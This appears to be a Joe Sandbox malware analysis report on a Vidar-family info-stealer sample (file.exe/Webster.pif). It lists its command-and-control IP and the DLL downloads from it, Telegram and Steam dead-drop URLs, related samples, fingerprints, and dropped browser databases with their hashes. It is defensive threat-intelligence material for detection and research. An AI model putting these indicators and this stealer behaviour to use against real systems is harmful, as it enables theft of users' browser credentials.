                                https://steamcommunity.com/my/wishlist/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/DataWebster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://t.me/armad2ahellosqls.dllsqlite3.dllInWebster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://help.steampowered.com/en/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/market/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/news/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AEGHJK.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://store.steampowered.com/subscriber_agreement/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199747278259/inventory/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgWebster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/discussions/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/stats/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/steam_refunds/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/msvcp140.dllHAWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAEGHJK.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://5.75.212.60/softokn3.dllIWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&aWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/workshop/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/legal/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContWebster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sqlite.org/copyright.html.Webster.pif, 0000000B.00000002.3327151135.000000000CA8D000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://5.75.212.60/ts8Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoAEGHJK.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/saenh.dllvWebster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60CBAFIJWebster.pif, 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199747278259:Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                5.75.212.60
                                		unknownGermany
                                		24940HETZNER-ASDEfalse
                                23.197.127.21
                                		steamcommunity.comUnited States
                                		20940AKAMAI-ASN1EUtrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1483134
                                Start date and time:2024-07-26 17:52:12 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 45s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@22/49@4/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 88
                                • Number of non-executed functions: 305
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:53:02API Interceptor1x Sleep call for process: file.exe modified
                                11:53:05API Interceptor959x Sleep call for process: Webster.pif modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                5.75.212.60IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    file.exeGet hashmaliciousVidarBrowse
                                      Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                        23.197.127.21http://steamcomunity.aiq.ru/Get hashmaliciousUnknownBrowse
                                        • steamcommunity.com/

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        steamcommunity.comIRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                        • 23.192.247.89
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 23.192.247.89
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 23.192.247.89
                                        LisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                        • 23.192.247.89
                                        LisectAVT_2403002B_344.exeGet hashmaliciousBdaejec, VidarBrowse
                                        • 23.207.106.113
                                        LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                        • 23.199.218.33
                                        LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                        • 23.199.218.33
                                        LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                        • 23.197.127.21
                                        35fcdf3a.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                        • 23.192.247.89
                                        Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                        • 23.192.247.89

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        HETZNER-ASDEhttps://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                        • 88.99.142.215
                                        IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                        • 5.75.212.60
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 5.75.212.60
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 5.75.212.60
                                        A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                        • 188.40.141.211
                                        C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                        • 159.69.71.228
                                        be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                        • 188.40.141.211
                                        Endermanch@MEMZ.exeGet hashmaliciousBdaejec, KillMBRBrowse
                                        • 116.202.167.133
                                        file.exeGet hashmaliciousSystemBCBrowse
                                        • 135.181.90.229
                                        AKAMAI-ASN1EUreference usfinancegl@ey.com - Search.pdfGet hashmaliciousUnknownBrowse
                                        • 2.22.61.187
                                        https://forms.office.com/Pages/ResponsePage.aspx?id=F0il39lMqEiGOt9WRpZx4wvO-e767m5Jgq527TAyuTxUNFdESUY2VVdIOU5UTDkxN01BVUg0V1dIWi4uGet hashmaliciousUnknownBrowse
                                        • 95.101.148.20
                                        file.exeGet hashmaliciousBabadedaBrowse
                                        • 23.200.0.9
                                        Fire Safety Partnership.pdfGet hashmaliciousHTMLPhisherBrowse
                                        • 23.200.0.33
                                        https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                                        • 80.67.82.187
                                        file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                        • 23.200.0.9
                                        file.exeGet hashmaliciousBabadedaBrowse
                                        • 23.200.0.9
                                        file.exeGet hashmaliciousBabadedaBrowse
                                        • 23.200.0.42
                                        zKXXNr7f2e.exeGet hashmaliciousBabadedaBrowse
                                        • 23.219.161.132
                                        N#U00b0025498563-.pdfGet hashmaliciousUnknownBrowse
                                        • 2.16.241.15

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        51c64c77e60f3980eea90869b68c58a8DS_Store.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                        • 5.75.212.60
                                        IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                        • 5.75.212.60
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 5.75.212.60
                                        yINa8PjdSm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 5.75.212.60
                                        DDPciclShm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 5.75.212.60
                                        uUW3k0UzfV.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 5.75.212.60
                                        yINa8PjdSm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 5.75.212.60
                                        DDPciclShm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 5.75.212.60
                                        uUW3k0UzfV.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 5.75.212.60
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 5.75.212.60
                                        37f463bf4616ecd445d4a1937da06e19Monetary_Funding_Sheet_2024.jsGet hashmaliciousWSHRATBrowse
                                        • 23.197.127.21
                                        IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                        • 23.197.127.21
                                        88z6JBPo00.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21
                                        fJDG7S5OD7.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21
                                        Ku8UpPuzaa.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21
                                        BvPEdRRQNz.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21
                                        uTQkPZ9odT.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21
                                        DOtQyvB2DJ.exeGet hashmaliciousTrojanRansomBrowse
                                        • 23.197.127.21
                                        RlPKbGYzSn.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21
                                        pVwINBeQe5.exeGet hashmaliciousUnknownBrowse
                                        • 23.197.127.21

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\ProgramData\freebl3.dll6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                            file.exeGet hashmaliciousVidarBrowse
                                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                  file.exeGet hashmaliciousVidarBrowse
                                                    file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                        Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                          azeyNF3kkf.exeGet hashmaliciousStealc, VidarBrowse
                                                            C:\ProgramData\mozglue.dll6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                              IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                                file.exeGet hashmaliciousVidarBrowse
                                                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                    JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                        file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                            Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                                              azeyNF3kkf.exeGet hashmaliciousStealc, VidarBrowse

                                                                                Created / dropped Files

                                                                                C:\ProgramData\GDHDAEBGCAAF\AAFIDG

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):51200
                                                                                Entropy (8bit):0.8745947603342119
                                                                                Encrypted:false
                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\AEGHJK

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.136471148832945
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\DAAAFB

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):10237
                                                                                Entropy (8bit):5.498288591230544
                                                                                Encrypted:false
                                                                                SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                Malicious:false
                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                C:\ProgramData\GDHDAEBGCAAF\DBFIEH

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):159744
                                                                                Entropy (8bit):0.5394293526345721
                                                                                Encrypted:false
                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\GDHDAEBGCAAF\ECBAEB

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.6732424250451717
                                                                                Encrypted:false
                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
